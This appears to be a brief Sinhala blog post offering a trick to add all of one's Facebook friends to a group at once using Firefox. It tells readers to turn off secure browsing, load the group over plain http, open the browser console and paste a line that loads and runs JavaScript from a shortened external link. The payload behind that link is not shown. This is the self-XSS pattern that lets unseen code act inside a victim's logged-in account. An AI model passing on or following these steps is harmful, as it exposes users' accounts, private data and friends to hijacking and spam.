Facebook Group එකකට සියලුම මිතුරන් එකවර එකතු කිරීම
Facebook Group එකකට සියලුම මිතුරන් එකවර එකතු කිරීම.(මේම ක්‍රමය තාමත් සාර්තකයි mozilla firefox එකෙන් )
මුලින්ම Account setting > Security > Secure browsing off කරන්න.
1. Firefox ගිහින් මිතුරන් එකතු කල යුතු group එකට යන්න. https හරහා නොවිය යුතුයි.
2. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.
3. පහත දී තිබෙන script code එක copy/paste කරන්න.
document.body.appendChild(document.createElement('script')).src='http://ow.ly/gkIXo
';
ඊට පස්සේ Enter key එක ඔබන්න.
No comments:
Post a Comment